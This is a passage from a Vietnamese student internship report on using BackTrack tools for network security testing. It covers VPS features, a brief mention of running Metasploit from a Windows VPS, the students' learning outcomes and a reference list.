dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống. Có thể cài lại hệ điều hành với thời gian từ 5-10 phút. Giá trị sử dụng của VPS Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp. Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng. Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. Được cấu hình và cài đặt hệ thống Firewall và Ddos Protection. Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh. Khai thác thông qua VPS Việc khai thác thông qua VPS được tiến hành thực hiện tương tự trên localhost. Nhưng đối với VPS sử dụng hệ điều hành Windows ta phải tiến hành cài đặt phần mềm Metasploit và tiến hành khai thác như trên Backtrack. Metasploit có thể download tại đây: http://www.metasploit.com/ Giao diện của Metasploit trên Windows
  • 36. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 35 KẾT QUẢ ĐẠT ĐƯỢC SAU QUÁ TRÌNH THỰC TẬP Trong suốt quá trình thực tập tại Trung tâm đào tạo quản trị & an ninh mạng Athena em đã có thêm nhiều kinh nghiệm.  Về kiến thức: ôn lại kỹ năng đã học, nâng cao khả năng học hỏi, trao dồi thêm nguồn kiến thức mới.  Về kỹ năng tổ chức điều hành công việc: có cơ hội làm việc nhóm để rèn luyện kỹ năng làm việc nhóm tốt hơn và khả năng phân chia công việc để hoàn thành đúng tiến độ.  Về thái độ, trách nhiệm: có trách nhiệm với công việc, luôn hoàn thành mục tiêu đặt ra.
  • 37. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 36 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển TÀI LIỆU THAM KHẢO Tài liệu tham khảo chủ yếu của trung tâm Athena và một số nguồn khác. http://www.hackingarticles.in https://www.youtube.com http://www.hackyshacky.com i Nguồn: http://athena.edu.vn/home/gioi-thieu-athena.html ii Nguồn: Sách CEH Lab Book – Trung tâm đào tạo quản trị & an ninh mạng Athena iii Nguồn: http://www.windowsecurity.com/whitepapers/windows_security/Windows-Enumeration-USER2SID-SID2USER.html